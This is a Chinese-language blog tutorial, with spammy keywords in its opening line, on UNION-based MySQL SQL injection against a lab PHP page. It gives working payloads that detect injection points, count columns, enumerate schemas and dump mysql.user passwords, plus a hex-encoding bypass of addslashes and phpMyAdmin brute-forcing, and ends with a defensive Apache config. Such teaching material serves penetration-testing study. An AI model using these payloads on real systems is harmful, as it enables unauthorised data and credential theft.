自适应型网站建设报价,东莞软件外包公司,有没有代做模型的网站,基于网站开发appsql 注入, union 联合注入
一, 参数分类
根据可控参数的类型不同, 对注入类型分类:
1. 数字型select * from table where id1
2. 字符型select * from table where usernameroot
3. 搜索型select * from table where id like %root%
4. 关于注释:注入时, 在查询参数中使用注…sql 注入, union 联合注入
一, 参数分类
根据可控参数的类型不同, 对注入类型分类:
1. 数字型select * from table where id1
2. 字符型select * from table where usernameroot
3. 搜索型select * from table where id like %root%
4. 关于注释:注入时, 在查询参数中使用注释需要url编码, 例如:# 使用 %23--空格 使用 --/* */二, 探测注入点
单引号测试 直接加一个单引号测试sql语句是否闭合, 如果报错或者页面显示异常则可能有注入点, 例如:
http://192.168.112.200/security/read.php?id1 页面异常或报错
结论: 可能存在注入点, 进一步使用逻辑测试逻辑测试
第一种情况:
http://192.168.112.200/security/read.php?id1 and 11 页面正常
http://192.168.112.200/security/read.php?id1 and 12 页面异常
结论: 是数字型参数.第二种情况
http://192.168.112.200/security/read.php?id1 and 11 页面正常
http://192.168.112.200/security/read.php?id1 and 12 页面也正常
结论: 不是数字型参数, 进一步使用单引号和注释测试
http://192.168.112.200/security/read.php?id1 and 11 -- 页面正常
http://192.168.112.200/security/read.php?id1 and 12 -- 页面异常
结论: 是字符型参数本篇博文涉及到的注入的语句默认以数字型参数为基础, 如果是字符型参数, 则注入语句需要额外添加单引号与注释符号, 例如:
数字型:
http://192.168.112.200/security/read.php?id1 union all select 1,2,3,4,5,6
字符型:
http://192.168.112.200/security/read.php?id1 union all select 1,2,3,4,5,6 -- 三, 注入测试
1. 探测有效列数
union 注入首先需要探测有效的列数, 使整体 union 语句有效.
案例 url :
http://192.168.112.200/security/read.php?id1情景:
这个url的页面显示的是一本书的两条信息, 分别是 [书名] 与 [标题], 在服务器查询的表是 [book], 字段名是 [bookname], [title] . 假设 [book] 表一共有6个字段, 其中书名与标题分别是 第 3 列, 第 4 列.
方式1: 使用 union 探测列数
因为 union 语句的规则要求, union 前后两个表的列数必须相同才能执行, 所以只有当 union 后面的 select 语句所写的列数与前半段查询的那个表的列数一样才能正常执行.前半段语句, 将 id 设置为 -1 , 目的是让union前面的语句查询不出结果, 并且让整体sql语句符合语法规则, 可以顺利执行.后半段语句, union 后面 select 通过数字列号猜测最多列数, 从少到多, 每次猜测后, 发送一次请求, 观察页面变化.如果错了会报出代码异常或页面内容有变化, 如果猜对了页面正常显示数据, 并且页面中, 原本显示 [书名] 与 [标题] 的位置上, 会代替它们显示对应列的数字编号 3, 4. 那么3, 4 这两个位置就是可以利用的注入点, 用于后续显示我们需要的数据.
测试过程: http://192.168.112.200/security/read.php?id-1 union select 1, 2 # 失败http://192.168.112.200/security/read.php?id-1 union select 1, 2, 3, 4 # 失败http://192.168.112.200/security/read.php?id-1 union select 1, 2, 3, 4, 5, 6 # 成功方式2: 使用 order by 探测列数
因为 order by 可以使用数字代表对应的字段做排序, 例如根据第1列排序: select * from table order by 1如果超出列数的范围则报错, 根据这个特点来测试表的最大列数,注意前面id的值必须是有效的, 使页面能够正常显示, 因为我们需要测试的是后面order by n 是否成功, 这与 union 注入不同: id1 order by 20 # 失败id1 order by 10 # 失败id1 order by 8 # 失败id1 order by 7 # 失败id1 order by 6 # 成功, 说明最多是6列2. union 简单注入测试
得到有效列数之后, 就可以进行基本的注入测试了, 比如执行一些 sql 函数, 来获取数据库的基本信息. 因为前面已经探测出列号 3, 4 位置上可以在页面显示, 所以利用这两个位置显示我们需要的数据. 例如: # 在网页上显示出当前查询的 数据库名 和 用户名http://.../read.php??id-1 union select 1,2,database(),user(),5,63. 注入获取服务器上所有数据库, 表, 列, 账户等数据.
利用 mysql 内置的 information_schema 数据库查询 information_schema.schemata 表, 记录所有数据库名 字段: schema_name 数据库名 information_schema.tables 表, 记录所有表名 字段: table_schema 数据库名 table_name 表名 information_schema.columns 表, 记录所有列名 字段: table_schema 数据库名 table_name 表名 column_name 列名
案例: 查询所有数据库的名称 方式1: 从 information_schema.schemata 表查询(包括不含表的空数据库) ?id-1 union select 1,2,3,
(select group_concat(schema_name) from information_schema.schemata) , 5,6方式2: 从 information_schema.tables 表查询(不包括空数据库) ?id-1 union select 1,2,3,
(select group_concat( distinct( table_schema ) ) from information_schema.tables) , 5,6查询已知库中的表名, 使用 limit n, m 每次查询一个表: # 第一张表:
?id-1 union select 1,2,3,
(select table_name from information_schema.tables where table_schemalearn limit 0,1) ,5,6
# 第二张表:
?id-1 union select 1,2,3,
(select table_name from information_schema.tables where table_schemalearn limit 1,1) ,5,6
# 第三张表:
?id-1 union select 1,2,3,
(select table_name from information_schema.tables where table_schemalearn limit 2,1) ,5,6(技巧) 使用 group_concat() 函数, 将多行数据合并为一行字符串, 显示所有表名, 逗号间隔 # 显示 learn 库的所有表
?id-1 union select 1,2,3,
(select group_concat(table_name) from information_schema.tables where table_schemalearn) , 5,6使用 group_concat() 函数合并所有行上的数据为一行字符串, 逗号间隔 # 显示 learn 库, user 表的所有列名
?id-1 union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_schemalearn and table_nameuser),5,6使用内置表 mysql.user 查询 root 账户信息 # mysql.user 表中记录所有数据库账户信息
?id-1 union select 1,2,3, (select concat(user, |, password) from mysql.user limit 1) , 5,6(技巧) 使用 group_concat() 函数 与 concat_ws() 函数, 合并多行多列数据 # concat_ws() 指定分隔符, 合并多列数据为一行字符串
?id-1 union select 1,2,3, (select concat_ws(|, user, password, host) from mysql.use limit 1), 5,6
# 与 group_concat() 组合, 先将多列数据连接为一行字符串, 在合并多行字符串.
?id-1 union select 1,2,3, (select group_concat( concat_ws(|, user, password, host) ) from mysql.user ) , 5,6四, 转16进制绕过, 对于后台代码对单引号做了转义处理的情况 原因: 如果后台代码对提交的参数中的单引号做了转义处理: addslashes($_GET[‘id’]) 此时注入的sql中单引号不起作用: where table_schema‘learn’ 解决办法: 将字符串转16进制再注入, 例如: # 普通字符串与十六进制相互转换select hex(learn) 结果: 6C6561726Eselect unhex(6C6561726E) 结果: learn注入: # 使用十六进制代替原本的普通字符串, 绕过单引号转义.
# where table_schemalearn
?id-1 union select 1,2,3,
(select group_concat(table_name) from information_schema.tables where table_schema0x6C6561726E), 5,6五, 数据库中出现phpmyadmin的情况 攻击: 尝试访问 /phpmyadmin, 如果配置认证方式为默认的: config, 则从网页可以直接进入后台, 如果认证方式为: http, 则需要输入用户名和密码登录, 可爆破. 防御: 禁用phpmyadmin远程访问, 例如xampp环境: # 配置文件路径:
/opt/lampp/etc/extra/httpd-xampp.conf# since XAMPP 1.4.3
Directory /opt/lampp/phpmyadminAllowOverride AuthConfig LimitRequire local # 只允许本地访问# Require all granted # 允许所有IP访问ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
/Directory